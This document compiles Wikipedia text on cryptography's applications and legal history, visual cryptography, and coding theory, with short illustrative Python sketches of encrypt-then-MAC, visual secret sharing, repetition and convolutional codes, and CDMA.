Typical examples of cryptographic primitives include pseudorandom functions, one-way functions, etc. One or more cryptographic primitives are often used to develop a more complex algorithm, called a cryptographic system, or cryptosystem. Cryptosystems (e.g., El-Gamal encryption) are designed to provide particular functionality (e.g., public key encryption) while guaranteeing certain security properties (e.g., chosen-plaintext attack (CPA) security in the random oracle model). Cryptosystems use the properties of the underlying cryptographic primitives to support the system's security properties. As the distinction between primitives and cryptosystems is somewhat arbitrary, a sophisticated cryptosystem can be derived from a combination of several more primitive cryptosystems. In many cases, the cryptosystem's structure involves back and forth communication among two or more parties in space (e.g., between the sender of a secure message and its receiver) or across time (e.g., cryptographically protected backup data). Such cryptosystems are sometimes called cryptographic protocols. Some widely known cryptosystems include RSA, Schnorr signature, ElGamal encryption, and Pretty Good Privacy (PGP). More complex cryptosystems include electronic cash[66] systems, signcryption systems, etc. Some more 'theoretical' cryptosystems include interactive proof systems[67] (like zero-knowledge proofs)[68] and systems for secret sharing.[69][70] Lightweight cryptography (LWC) concerns cryptographic algorithms developed for a strictly constrained environment. The growth of the Internet of Things (IoT) has spurred research into the development of lightweight algorithms that are better suited for such environments. An IoT environment imposes strict constraints on power consumption, processing power, and security.[71] Algorithms such as PRESENT, AES, and SPECK are examples of the many LWC algorithms that have been developed to meet the standard set by the National Institute of Standards and Technology.[72] Cryptography is widely used on the internet to help protect user data and prevent eavesdropping. To ensure secrecy during transmission, many systems use private key cryptography to protect transmitted information. With public-key systems, one can maintain secrecy without a master key or a large number of keys.[73] But some schemes, such as BitLocker and VeraCrypt, generally do not use public-private key cryptography. For example, VeraCrypt uses a password hash to generate the single private key; however, it can be configured to run in public-private key systems. The open-source encryption library OpenSSL provides free and open-source encryption software and tools. The most commonly used encryption cipher suite is AES,[74] as it has hardware acceleration for all x86-based processors that have AES-NI. A close contender is ChaCha20-Poly1305, which is a stream cipher; it is commonly used for mobile devices, as many are ARM-based and do not feature the AES-NI instruction set extension. Cryptography can be used to secure communications by encrypting them.
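To illustrate how primitives compose into a small cryptosystem, as discussed above, here is a hypothetical sketch (not from the article, and not a vetted design): a keystream is derived from SHA-256 over a key, nonce, and counter and XORed with the plaintext, and an HMAC tag is then computed over the ciphertext ("encrypt-then-MAC"), so the receiver can reject tampered messages before decrypting.

```python
# Toy composition of primitives into a small cryptosystem ("encrypt-then-MAC").
# Illustrative only: the keystream construction here is ad hoc, not a vetted cipher.
import hashlib, hmac, secrets

def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]

def encrypt_then_mac(enc_key: bytes, mac_key: bytes, plaintext: bytes):
    nonce = secrets.token_bytes(16)
    ks = keystream(enc_key, nonce, len(plaintext))
    ct = bytes(p ^ k for p, k in zip(plaintext, ks))
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return nonce, ct, tag

def decrypt(enc_key: bytes, mac_key: bytes, nonce: bytes, ct: bytes, tag: bytes) -> bytes:
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("authentication failed: message rejected")
    ks = keystream(enc_key, nonce, len(ct))
    return bytes(c ^ k for c, k in zip(ct, ks))

enc_key, mac_key = secrets.token_bytes(32), secrets.token_bytes(32)
nonce, ct, tag = encrypt_then_mac(enc_key, mac_key, b"meet at the usual place")
print(decrypt(enc_key, mac_key, nonce, ct, tag))
```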
Websites use encryption via HTTPS.[75] "End-to-end" encryption, where only sender and receiver can read messages, is implemented for email in Pretty Good Privacy and for secure messaging in general in WhatsApp, Signal and Telegram.[75] Operating systems use encryption to keep passwords secret, conceal parts of the system, and ensure that software updates are truly from the system maker.[75] Instead of storing plaintext passwords, computer systems store hashes thereof; then, when a user logs in, the system passes the given password through a cryptographic hash function and compares it to the hashed value on file. In this manner, neither the system nor an attacker has at any point access to the password in plaintext.[75] Encryption is sometimes used to encrypt one's entire drive. For example, University College London has implemented BitLocker (a program by Microsoft) to render drive data opaque without users logging in.[75] Cryptographic techniques enable cryptocurrency technologies, such as distributed ledger technologies (e.g., blockchains), which finance cryptoeconomics applications such as decentralized finance (DeFi). Key cryptographic techniques that enable cryptocurrencies and cryptoeconomics include, but are not limited to: cryptographic keys, cryptographic hash functions, asymmetric (public key) encryption, Multi-Factor Authentication (MFA), End-to-End Encryption (E2EE), and Zero Knowledge Proofs (ZKP). Cryptography has long been of interest to intelligence gathering and law enforcement agencies.[9] Secret communications may be criminal or even treasonous. Because of its facilitation of privacy, and the diminution of privacy attendant on its prohibition, cryptography is also of considerable interest to civil rights supporters. Accordingly, there has been a history of controversial legal issues surrounding cryptography, especially since the advent of inexpensive computers has made widespread access to high-quality cryptography possible. In some countries, even the domestic use of cryptography is, or has been, restricted. Until 1999, France significantly restricted the use of cryptography domestically, though it has since relaxed many of these rules. In China and Iran, a license is still required to use cryptography.[7] Many countries have tight restrictions on the use of cryptography. Among the more restrictive are laws in Belarus, Kazakhstan, Mongolia, Pakistan, Singapore, Tunisia, and Vietnam.[76] In the United States, cryptography is legal for domestic use, but there has been much conflict over legal issues related to cryptography.[9] One particularly important issue has been the export of cryptography and cryptographic software and hardware. Probably because of the importance of cryptanalysis in World War II and an expectation that cryptography would continue to be important for national security, many Western governments have, at some point, strictly regulated export of cryptography. After World War II, it was illegal in the US to sell or distribute encryption technology overseas; in fact, encryption was designated as auxiliary military equipment and put on the United States Munitions List.[77] Until the development of the personal computer, asymmetric key algorithms (i.e., public key techniques), and the Internet, this was not especially problematic. However, as the Internet grew and computers became more widely available, high-quality encryption techniques became well known around the globe. In the 1990s, there were several challenges to US export regulation of cryptography.
After the source code for Philip Zimmermann's Pretty Good Privacy (PGP) encryption program found its way onto the Internet in June 1991, a complaint by RSA Security (then called RSA Data Security, Inc.) resulted in a lengthy criminal investigation of Zimmermann by the US Customs Service and the FBI, though no charges were ever filed.[78][79] Daniel J. Bernstein, then a graduate student at UC Berkeley, brought a lawsuit against the US government challenging some aspects of the restrictions based on free speech grounds. The 1995 case Bernstein v. United States ultimately resulted in a 1999 decision that printed source code for cryptographic algorithms and systems was protected as free speech by the United States Constitution.[80] In 1996, thirty-nine countries signed the Wassenaar Arrangement, an arms control treaty that deals with the export of arms and "dual-use" technologies such as cryptography. The treaty stipulated that the use of cryptography with short key-lengths (56-bit for symmetric encryption, 512-bit for RSA) would no longer be export-controlled.[81] Cryptography exports from the US became less strictly regulated as a consequence of a major relaxation in 2000;[82] there are no longer very many restrictions on key sizes in US-exported mass-market software. Since this relaxation in US export restrictions, and because most personal computers connected to the Internet include US-sourced web browsers such as Firefox or Internet Explorer, almost every Internet user worldwide has potential access to quality cryptography via their browsers (e.g., via Transport Layer Security). The Mozilla Thunderbird and Microsoft Outlook e-mail client programs similarly can transmit and receive emails via TLS, and can send and receive email encrypted with S/MIME. Many Internet users do not realize that their basic application software contains such extensive cryptosystems. These browsers and email programs are so ubiquitous that even governments whose intent is to regulate civilian use of cryptography generally do not find it practical to do much to control distribution or use of cryptography of this quality, so even when such laws are in force, actual enforcement is often effectively impossible. Another contentious issue connected to cryptography in the United States is the influence of the National Security Agency on cipher development and policy.[9] The NSA was involved with the design of DES during its development at IBM and its consideration by the National Bureau of Standards as a possible Federal Standard for cryptography.[83] DES was designed to be resistant to differential cryptanalysis,[84] a powerful and general cryptanalytic technique known to the NSA and IBM, that became publicly known only when it was rediscovered in the late 1980s.[85] According to Steven Levy, IBM discovered differential cryptanalysis,[79] but kept the technique secret at the NSA's request. The technique became publicly known only when Biham and Shamir re-discovered and announced it some years later. The entire affair illustrates the difficulty of determining what resources and knowledge an attacker might actually have. Another instance of the NSA's involvement was the 1993 Clipper chip affair, an encryption microchip intended to be part of the Capstone cryptography-control initiative. Clipper was widely criticized by cryptographers for two reasons. The cipher algorithm (called Skipjack) was then classified (declassified in 1998, long after the Clipper initiative lapsed).
The classified cipher caused concerns that the NSA had deliberately made the cipher weak to assist its intelligence efforts. The whole initiative was also criticized based on its violation of Kerckhoffs's Principle, as the scheme included a special escrow key held by the government for use by law enforcement (i.e., wiretapping).[79] Cryptography is central to digital rights management (DRM), a group of techniques for technologically controlling use of copyrighted material, being widely implemented and deployed at the behest of some copyright holders. In 1998, U.S. President Bill Clinton signed the Digital Millennium Copyright Act (DMCA), which criminalized all production, dissemination, and use of certain cryptanalytic techniques and technology (now known or later discovered); specifically, those that could be used to circumvent DRM technological schemes.[86] This had a noticeable impact on the cryptography research community since an argument can be made that any cryptanalytic research violated the DMCA. Similar statutes have since been enacted in several countries and regions, including the implementation in the EU Copyright Directive. Similar restrictions are called for by treaties signed by World Intellectual Property Organization member-states. The United States Department of Justice and FBI have not enforced the DMCA as rigorously as had been feared by some, but the law, nonetheless, remains a controversial one. Niels Ferguson, a well-respected cryptography researcher, has publicly stated that he will not release some of his research into an Intel security design for fear of prosecution under the DMCA.[87] Cryptologist Bruce Schneier has argued that the DMCA encourages vendor lock-in, while inhibiting actual measures toward cyber-security.[88] Both Alan Cox (longtime Linux kernel developer) and Edward Felten (and some of his students at Princeton) have encountered problems related to the Act. Dmitry Sklyarov was arrested during a visit to the US from Russia, and jailed for five months pending trial for alleged violations of the DMCA arising from work he had done in Russia, where the work was legal. In 2007, the cryptographic keys responsible for Blu-ray and HD DVD content scrambling were discovered and released onto the Internet. In both cases, the Motion Picture Association of America sent out numerous DMCA takedown notices, and there was a massive Internet backlash[10] triggered by the perceived impact of such notices on fair use and free speech. In the United Kingdom, the Regulation of Investigatory Powers Act gives UK police the powers to force suspects to decrypt files or hand over passwords that protect encryption keys. Failure to comply is an offense in its own right, punishable on conviction by a two-year jail sentence or up to five years in cases involving national security.[8] Successful prosecutions have occurred under the Act; the first, in 2009,[89] resulted in a term of 13 months' imprisonment.[90] Similar forced disclosure laws in Australia, Finland, France, and India compel individual suspects under investigation to hand over encryption keys or passwords during a criminal investigation. In the United States, the federal criminal case of United States v.
Fricosu addressed whether a search warrant can compel a person to reveal an encryption passphrase or password.[91] The Electronic Frontier Foundation (EFF) argued that this is a violation of the protection from self-incrimination given by the Fifth Amendment.[92] In 2012, the court ruled that under the All Writs Act, the defendant was required to produce an unencrypted hard drive for the court.[93] In many jurisdictions, the legal status of forced disclosure remains unclear. The 2016 FBI–Apple encryption dispute concerns the ability of courts in the United States to compel manufacturers' assistance in unlocking cell phones whose contents are cryptographically protected. As a potential counter-measure to forced disclosure, some cryptographic software supports plausible deniability, where the encrypted data is indistinguishable from unused random data (such as that of a drive which has been securely wiped).
https://en.wikipedia.org/wiki/Cryptography#Symmetric-key_cryptography
Visual cryptography is a cryptographic technique which allows visual information (pictures, text, etc.) to be encrypted in such a way that the decrypted information appears as a visual image. One of the best-known techniques has been credited to Moni Naor and Adi Shamir, who developed it in 1994.[1] They demonstrated a visual secret sharing scheme, where a binary image was broken up into n shares so that only someone with all n shares could decrypt the image, while any n − 1 shares revealed no information about the original image. Each share was printed on a separate transparency, and decryption was performed by overlaying the shares. When all n shares were overlaid, the original image would appear. There are several generalizations of the basic scheme, including k-out-of-n visual cryptography,[2][3] and using opaque sheets but illuminating them by multiple sets of identical illumination patterns under the recording of only one single-pixel detector.[4] Using a similar idea, transparencies can be used to implement a one-time pad encryption, where one transparency is a shared random pad, and another transparency acts as the ciphertext. Normally, there is an expansion of the space requirement in visual cryptography. But if one of the two shares is structured recursively, the efficiency of visual cryptography can be increased to 100%.[5] Some antecedents of visual cryptography are in patents from the 1960s.[6][7] Other antecedents are in the work on perception and secure communication.[8][9] Visual cryptography can be used to protect biometric templates, in which case decryption does not require any complex computations.[10] In this example, the binary image has been split into two component images. Each component image has a pair of pixels for every pixel in the original image. These pixel pairs are shaded black or white according to the following rule: if the original image pixel was black, the pixel pairs in the component images must be complementary; randomly shade one ■□, and the other □■. When these complementary pairs are overlapped, they will appear dark gray. On the other hand, if the original image pixel was white, the pixel pairs in the component images must match: both ■□ or both □■. When these matching pairs are overlapped, they will appear light gray. So, when the two component images are superimposed, the original image appears. However, without the other component, a component image reveals no information about the original image; it is indistinguishable from a random pattern of ■□ / □■ pairs. Moreover, if you have one component image, you can use the shading rules above to produce a counterfeit component image that combines with it to produce any image at all. Sharing a secret with an arbitrary number of people, n, such that at least 2 of them are required to decode the secret is one form of the visual secret sharing scheme presented by Moni Naor and Adi Shamir in 1994. In this scheme we have a secret image which is encoded into n shares printed on transparencies. The shares appear random and contain no decipherable information about the underlying secret image; however, if any 2 of the shares are stacked on top of one another, the secret image becomes decipherable by the human eye. Every pixel from the secret image is encoded into multiple subpixels in each share image using a matrix to determine the color of the pixels.
In the (2, n) case, a white pixel in the secret image is encoded using a matrix from the following set, where each row gives the subpixel pattern for one of the components:

{all permutations of the columns of} \( C_0 = \begin{bmatrix} 1 & 0 & \cdots & 0 \\ 1 & 0 & \cdots & 0 \\ \vdots & \vdots & & \vdots \\ 1 & 0 & \cdots & 0 \end{bmatrix} \),

while a black pixel in the secret image is encoded using a matrix from the following set:

{all permutations of the columns of} \( C_1 = \begin{bmatrix} 1 & 0 & \cdots & 0 \\ 0 & 1 & \cdots & 0 \\ \vdots & \vdots & & \vdots \\ 0 & 0 & \cdots & 1 \end{bmatrix} \).

For instance, in the (2, 2) sharing case (the secret is split into 2 shares and both shares are required to decode the secret) we use complementary matrices to share a black pixel and identical matrices to share a white pixel. Stacking the shares, all the subpixels associated with a black pixel are now black, while 50% of the subpixels associated with a white pixel remain white. Horng et al. proposed a method that allows n − 1 colluding parties to cheat an honest party in visual cryptography. They take advantage of knowing the underlying distribution of the pixels in the shares to create new shares that combine with existing shares to form a new secret message of the cheaters' choosing.[11] We know that 2 shares are enough to decode the secret image using the human visual system. But examining two shares also gives some information about the 3rd share. For instance, colluding participants may examine their shares to determine when they both have black pixels and use that information to determine that another participant will also have a black pixel in that location. Knowing where black pixels exist in another party's share allows them to create a new share that will combine with the predicted share to form a new secret message. In this way a set of colluding parties that have enough shares to access the secret code can cheat other honest parties. 2×2 subpixels can also encode a binary image in each component image, as in the scheme on the right. Each white pixel of each component image is represented by two black subpixels, while each black pixel is represented by three black subpixels. When overlaid, each white pixel of the secret image is represented by three black subpixels, while each black pixel is represented by all four subpixels black. Each corresponding pixel in the component images is randomly rotated to avoid orientation leaking information about the secret image.[12]
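As a hypothetical sketch of the (2, 2) scheme described above (not from the article): each secret pixel is expanded into a pair of subpixels in each share, with matching pairs for white pixels and complementary pairs for black pixels, so stacking the shares (a bitwise OR of black subpixels) reveals the image while either share alone is uniformly random.

```python
# Toy (2, 2) visual secret sharing: each secret pixel becomes a pair of
# subpixels per share; 1 = black subpixel, 0 = white subpixel.
import secrets

def make_shares(secret_row):
    """secret_row: list of pixels, 0 = white, 1 = black."""
    share1, share2 = [], []
    for pixel in secret_row:
        pattern = [1, 0] if secrets.randbits(1) else [0, 1]
        complement = [1 - b for b in pattern]
        share1 += pattern
        # white pixel: identical patterns; black pixel: complementary patterns
        share2 += pattern if pixel == 0 else complement
    return share1, share2

def stack(share1, share2):
    """Overlaying transparencies: a subpixel is black if black in either share."""
    return [a | b for a, b in zip(share1, share2)]

secret = [0, 1, 1, 0, 1]     # a single row of the secret image
s1, s2 = make_shares(secret)
print(s1)                    # looks random on its own
print(s2)                    # looks random on its own
print(stack(s1, s2))         # black pixels -> fully black pairs (1, 1);
                             # white pixels -> half-black pairs
```

Because each share in isolation is an unbiased random sequence of ■□ / □■ pairs, it leaks nothing about the secret, matching the security claim made above.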
https://en.wikipedia.org/wiki/Visual_cryptography
Coding theory is the study of the properties of codes and their respective fitness for specific applications. Codes are used for data compression, cryptography, error detection and correction, data transmission and data storage. Codes are studied by various scientific disciplines—such as information theory, electrical engineering, mathematics, linguistics, and computer science—for the purpose of designing efficient and reliable data transmission methods. This typically involves the removal of redundancy and the correction or detection of errors in the transmitted data. There are four types of coding: data compression (source coding), error control (channel coding), cryptographic coding, and line coding.[1] Data compression attempts to remove unwanted redundancy from the data from a source in order to transmit it more efficiently. For example, DEFLATE data compression makes files smaller, for purposes such as to reduce Internet traffic. Data compression and error correction may be studied in combination. Error correction adds useful redundancy to the data from a source to make the transmission more robust to disturbances present on the transmission channel. The ordinary user may not be aware of many applications using error correction. A typical music compact disc (CD) uses the Reed–Solomon code to correct for scratches and dust. In this application the transmission channel is the CD itself. Cell phones also use coding techniques to correct for the fading and noise of high-frequency radio transmission. Data modems, telephone transmissions, and the NASA Deep Space Network all employ channel coding techniques to get the bits through, for example the turbo code and LDPC codes. The decisive event which established the discipline of information theory, and brought it to immediate worldwide attention, was the publication of Claude E. Shannon's classic paper "A Mathematical Theory of Communication" in the Bell System Technical Journal in July and October 1948. In this revolutionary and groundbreaking paper, work which Shannon had substantially completed at Bell Labs by the end of 1944, Shannon for the first time introduced the qualitative and quantitative model of communication as a statistical process underlying information theory, opening with the assertion that the fundamental problem of communication is that of reproducing at one point, either exactly or approximately, a message selected at another point. Shannon's paper focuses on the problem of how best to encode the information a sender wants to transmit. In this fundamental work he used tools in probability theory, developed by Norbert Wiener, which were in their nascent stages of being applied to communication theory at that time. Shannon developed information entropy as a measure for the uncertainty in a message while essentially inventing the field of information theory. The binary Golay code was developed in 1949. It is an error-correcting code capable of correcting up to three errors in each 24-bit word, and detecting a fourth. Richard Hamming won the Turing Award in 1968 for his work at Bell Labs in numerical methods, automatic coding systems, and error-detecting and error-correcting codes. He invented the concepts known as Hamming codes, Hamming windows, Hamming numbers, and Hamming distance. In 1972, Nasir Ahmed proposed the discrete cosine transform (DCT), which he developed with T. Natarajan and K. R. Rao in 1973.[2] The DCT is the most widely used lossy compression algorithm, the basis for multimedia formats such as JPEG, MPEG and MP3. The aim of source coding is to take the source data and make it smaller. Data can be seen as a random variable X : Ω → 𝒳, where each value x ∈ 𝒳 appears with probability P[X = x].
Data are encoded by strings (words) over analphabetΣ{\displaystyle \Sigma }. A code is a functionC:X→Σ∗{\displaystyle C:{\mathcal {X}}\to \Sigma ^{*}};C(x){\displaystyle C(x)}is the code word associated withx{\displaystyle x}. The length of the code word is written asl(C(x)){\displaystyle l(C(x))}. The expected length of a code isl(C)=∑x∈Xl(C(x))P[X=x]{\displaystyle l(C)=\sum _{x\in {\mathcal {X}}}l(C(x))\,\mathbb {P} [X=x]}. The concatenation of code words isC(x1,…,xk)=C(x1)C(x2)⋯C(xk){\displaystyle C(x_{1},\ldots ,x_{k})=C(x_{1})C(x_{2})\cdots C(x_{k})}. The code word of the empty string is the empty string itself:C(ϵ)=ϵ{\displaystyle C(\epsilon )=\epsilon }. Entropyof a source is the measure of information. Basically, source codes try to reduce the redundancy present in the source, and represent the source with fewer bits that carry more information. Data compression which explicitly tries to minimize the average length of messages according to a particular assumed probability model is calledentropy encoding. Various techniques used by source coding schemes try to achieve the limit of entropy of the source:C(x) ≥H(x), whereH(x) is the entropy of the source (bitrate) andC(x) is the bitrate after compression. In particular, no source coding scheme can be better than the entropy of the source. Facsimiletransmission uses a simplerun length code. Source coding removes all data superfluous to the need of the transmitter, decreasing the bandwidth required for transmission. The purpose of channel coding theory is to find codes which transmit quickly, contain many validcode wordsand can correct or at leastdetectmany errors. While not mutually exclusive, performance in these areas is a trade-off. So, different codes are optimal for different applications. The needed properties of this code mainly depend on the probability of errors happening during transmission. In a typical CD, the impairment is mainly dust or scratches. CDs usecross-interleaved Reed–Solomon codingto spread the data out over the disk.[3] Although not a very good code, a simple repeat code can serve as an understandable example. Suppose we take a block of data bits (representing sound) and send it three times. At the receiver we will examine the three repetitions bit by bit and take a majority vote. The twist on this is that we do not merely send the bits in order. We interleave them. The block of data bits is first divided into 4 smaller blocks. Then we cycle through the block and send one bit from the first, then the second, etc. This is done three times to spread the data out over the surface of the disk. In the context of the simple repeat code, this may not appear effective. However, there are more powerful codes known which are very effective at correcting the "burst" error of a scratch or a dust spot when this interleaving technique is used. Other codes are more appropriate for different applications. Deep space communications are limited by thethermal noiseof the receiver which is more of a continuous nature than a bursty nature. Likewise, narrowband modems are limited by the noise present in the telephone network, which is also modeled better as a continuous disturbance.[citation needed]Cell phones are subject to rapidfading. The high frequencies used can cause rapid fading of the signal even if the receiver is moved a few inches. 
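The repeat-and-interleave scheme described above can be sketched in a few lines of Python (a toy illustration only — an actual CD uses cross-interleaved Reed–Solomon coding, not this code). Each block is interleaved across four sub-blocks and sent three times; the decoder undoes the interleaving and takes a majority vote, so a burst no longer than one copy of the block corrupts at most one of the three votes for any given bit:

```python
import random

REPEATS, SUBBLOCKS = 3, 4

def interleave(block):
    # send one bit from each of the SUBBLOCKS sub-blocks in turn
    step = len(block) // SUBBLOCKS
    return [block[s * step + i] for i in range(step) for s in range(SUBBLOCKS)]

def deinterleave(block):
    step = len(block) // SUBBLOCKS
    out, k = [0] * len(block), 0
    for i in range(step):
        for s in range(SUBBLOCKS):
            out[s * step + i] = block[k]
            k += 1
    return out

def encode(bits):
    return interleave(bits) * REPEATS            # three interleaved copies, back to back

def decode(chips):
    n = len(chips) // REPEATS
    copies = [deinterleave(chips[i * n:(i + 1) * n]) for i in range(REPEATS)]
    return [1 if sum(votes) >= 2 else 0 for votes in zip(*copies)]  # majority vote

data = [random.randint(0, 1) for _ in range(8)]  # block length divisible by SUBBLOCKS
rx = encode(data)
for i in range(10, 16):                          # a 6-chip "scratch" (burst error)
    rx[i] ^= 1
assert decode(rx) == data                        # the burst is corrected
```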
Again, there is a class of channel codes that are designed to combat fading.[citation needed] The termalgebraic coding theorydenotes the sub-field of coding theory where the properties of codes are expressed in algebraic terms and then further researched.[citation needed] Algebraic coding theory is basically divided into two major types of codes: linear block codes and convolutional codes.[citation needed] It analyzes the following three properties of a code – mainly: the code word length, the total number of valid code words, and the minimum distance between two valid code words (usually measured by theHamming distance).[citation needed] Linear block codes have the property oflinearity, i.e. the sum of any two codewords is also a code word, and they are applied to the source bits in blocks, hence the name linear block codes. There are block codes that are not linear, but it is difficult to prove that a code is a good one without this property.[4] Linear block codes are summarized by their symbol alphabets (e.g., binary or ternary) and parameters (n,m,dmin),[5]wherenis the length of the codeword in symbols,mis the number of source symbols used for encoding at once, anddminis the minimum Hamming distance of the code. There are many types of linear block codes, such as cyclic codes (e.g.,Hamming codes), repetition codes, parity codes,Reed–Solomon codes, andReed–Muller codes. Block codes are tied to thesphere packingproblem, which has received some attention over the years. In two dimensions, it is easy to visualize. Take a bunch of pennies flat on the table and push them together. The result is a hexagon pattern like a bee's nest. But block codes rely on more dimensions which cannot easily be visualized. The powerful (24,12)Golay codeused in deep space communications uses 24 dimensions. If used as a binary code (which it usually is) the dimensions refer to the length of the codeword as defined above. The theory of coding uses theN-dimensional sphere model. For example, how many pennies can be packed into a circle on a tabletop, or in 3 dimensions, how many marbles can be packed into a globe. Other considerations enter the choice of a code. For example, hexagon packing into the constraint of a rectangular box will leave empty space at the corners. As the dimensions get larger, the percentage of empty space grows smaller. But at certain dimensions, the packing uses all the space and these codes are the so-called "perfect" codes. The only nontrivial and useful perfect codes are the distance-3 Hamming codes with parameters satisfying (2^r − 1, 2^r − 1 − r, 3), and the [23,12,7] binary and [11,6,5] ternary Golay codes.[4][5] Another code property is the number of neighbors that a single codeword may have.[6]Again, consider pennies as an example. First we pack the pennies in a rectangular grid. Each penny will have 4 near neighbors (and 4 at the corners which are farther away). In a hexagon, each penny will have 6 near neighbors. When we increase the dimensions, the number of near neighbors increases very rapidly. The result is that the number of ways for noise to make the receiver choose a neighbor (hence an error) grows as well. This is a fundamental limitation of block codes, and indeed all codes. It may be harder to cause an error to a single neighbor, but the number of neighbors can be large enough so the total error probability actually suffers.[6] Properties of linear block codes are used in many applications. For example, the syndrome-coset uniqueness property of linear block codes is used in trellis shaping,[7]one of the best-knownshaping codes. The idea behind a convolutional code is to make every codeword symbol be the weighted sum of the various input message symbols. This is likeconvolutionused inLTIsystems to find the output of a system, when you know the input and impulse response. 
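That idea can be sketched with a toy rate-1/2 encoder (generator taps (1,1,1) and (1,0,1), the common textbook "(7,5)" pair, used here purely as an illustration — standards such as V.32 or GSM specify their own polynomials). Every output symbol is the mod-2 weighted sum (an XOR) of the current input bit and the bits held in the shift register:

```python
G = [(1, 1, 1), (1, 0, 1)]        # generator taps: which register positions feed each output

def conv_encode(bits):
    state = [0, 0]                # two-bit shift register (constraint length 3)
    out = []
    for b in bits:
        window = [b] + state      # current input bit followed by the register contents
        for taps in G:            # each output stream is a mod-2 weighted sum of the window
            out.append(sum(x * t for x, t in zip(window, taps)) % 2)
        state = [b] + state[:-1]  # shift the register
    return out

print(conv_encode([1, 0, 1, 1]))  # -> [1, 1, 1, 0, 0, 0, 0, 1]
```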
So we generally find the output of the convolutional encoder by convolving the input bits with the states of the encoder's shift registers. Fundamentally, convolutional codes do not offer more protection against noise than an equivalent block code. In many cases, they generally offer greater simplicity of implementation over a block code of equal power. The encoder is usually a simple circuit which has state memory and some feedback logic, normallyXOR gates. Thedecodercan be implemented in software or firmware. TheViterbi algorithmis the optimum algorithm used to decode convolutional codes. There are simplifications to reduce the computational load. They rely on searching only the most likely paths. Although not optimum, they have generally been found to give good results in low noise environments. Convolutional codes are used in voiceband modems (V.32, V.17, V.34) and in GSM mobile phones, as well as satellite and military communication devices. Cryptographyor cryptographic coding is the practice and study of techniques forsecure communicationin the presence of third parties (calledadversaries).[8]More generally, it is about constructing and analyzingprotocolsthat block adversaries;[9]various aspects ininformation securitysuch as dataconfidentiality,data integrity,authentication, andnon-repudiation[10]are central to modern cryptography. Modern cryptography exists at the intersection of the disciplines ofmathematics,computer science, andelectrical engineering. Applications of cryptography includeATM cards,computer passwords, andelectronic commerce. Cryptography prior to the modern age was effectively synonymous withencryption, the conversion of information from a readable state to apparentnonsense. The originator of an encrypted message shared the decoding technique needed to recover the original information only with intended recipients, thereby precluding unwanted persons from doing the same. SinceWorld War Iand the advent of thecomputer, the methods used to carry out cryptology have become increasingly complex and its application more widespread. Modern cryptography is heavily based on mathematical theory and computer science practice; cryptographic algorithms are designed aroundcomputational hardness assumptions, making such algorithms hard to break in practice by any adversary. It is theoretically possible to break such a system, but it is infeasible to do so by any known practical means. These schemes are therefore termed computationally secure; theoretical advances, e.g., improvements ininteger factorizationalgorithms, and faster computing technology require these solutions to be continually adapted. There existinformation-theoretically secureschemes that provably cannot be broken even with unlimited computing power—an example is theone-time pad—but these schemes are more difficult to implement than the best theoretically breakable but computationally secure mechanisms. Aline code(also called digital baseband modulation or digitalbasebandtransmission method) is acodechosen for use within acommunications systemfor basebandtransmissionpurposes. Line coding is often used for digital data transport. It consists of representing thedigital signalto be transported by an amplitude- and time-discrete signal that is optimally tuned for the specific properties of the physical channel (and of the receiving equipment). Thewaveformpattern of voltage or current used to represent the 1s and 0s of digital data on a transmission link is calledline encoding. 
The common types of line encoding areunipolar,polar,bipolar, andManchester encoding. Another concern of coding theory is designing codes that helpsynchronization. A code may be designed so that aphase shiftcan be easily detected and corrected and that multiple signals can be sent on the same channel.[citation needed] Another application of codes, used in some mobile phone systems, iscode-division multiple access(CDMA). Each phone is assigned a code sequence that is approximately uncorrelated with the codes of other phones.[citation needed]When transmitting, the code word is used to modulate the data bits representing the voice message. At the receiver, a demodulation process is performed to recover the data. The properties of this class of codes allow many users (with different codes) to use the same radio channel at the same time. To the receiver, the signals of other users will appear to the demodulator only as low-level noise.[citation needed] Another general class of codes is theautomatic repeat-request(ARQ) codes. In these codes the sender adds redundancy to each message for error checking, usually by adding check bits. If the check bits are not consistent with the rest of the message when it arrives, the receiver will ask the sender to retransmit the message. All but the simplestwide area networkprotocols use ARQ. Common protocols includeSDLC(IBM),TCP(Internet),X.25(International) and many others. There is an extensive field of research on this topic because of the problem of matching a rejected packet against a new packet. Is it a new one or is it a retransmission? Typically numbering schemes are used, as in TCP ("RFC 793",Internet Engineering Task Force(IETF), September 1981). Group testinguses codes in a different way. Consider a large group of items in which a very few are different in a particular way (e.g., defective products or infected test subjects). The idea of group testing is to determine which items are "different" by using as few tests as possible. The origin of the problem has its roots in theSecond World Warwhen theUnited States Army Air Forcesneeded to test its soldiers forsyphilis.[11] Information is encoded analogously in theneural networksofbrains, inanalog signal processing, and inanalog electronics. Aspects of analog coding include analog error correction,[12]analog data compression[13]and analog encryption.[14] Neural codingis aneuroscience-related field concerned with how sensory and other information is represented in thebrainbynetworksofneurons. The main goal of studying neural coding is to characterize the relationship between thestimulusand the individual or ensemble neuronal responses and the relationship among electrical activity of the neurons in the ensemble.[15]It is thought that neurons can encode bothdigitalandanaloginformation,[16]and that neurons follow the principles of information theory and compress information,[17]and detect and correct[18]errors in the signals that are sent throughout the brain and wider nervous system.
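To make the code-division (CDMA) idea described above concrete, here is a minimal sketch in which two users share one channel using orthogonal ±1 spreading sequences (two rows of a 4×4 Walsh–Hadamard matrix, chosen only for illustration). Correlating the summed signal against one user's code recovers that user's bits, while the other user's contribution cancels out:

```python
import random

CODES = {"A": [1, 1, 1, 1], "B": [1, -1, 1, -1]}   # two orthogonal spreading codes

def spread(bits, code):
    # map each data bit 0/1 to -1/+1 and multiply it by the whole chip sequence
    return [(2 * b - 1) * c for b in bits for c in code]

def despread(signal, code, n_bits):
    L, out = len(code), []
    for i in range(n_bits):
        chunk = signal[i * L:(i + 1) * L]
        corr = sum(s * c for s, c in zip(chunk, code))   # correlate with this user's code
        out.append(1 if corr > 0 else 0)
    return out

bits_a = [random.randint(0, 1) for _ in range(8)]
bits_b = [random.randint(0, 1) for _ in range(8)]
channel = [a + b for a, b in zip(spread(bits_a, CODES["A"]),
                                 spread(bits_b, CODES["B"]))]   # both users transmit at once
assert despread(channel, CODES["A"], 8) == bits_a
assert despread(channel, CODES["B"], 8) == bits_b
```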
https://en.wikipedia.org/wiki/Coding_theory
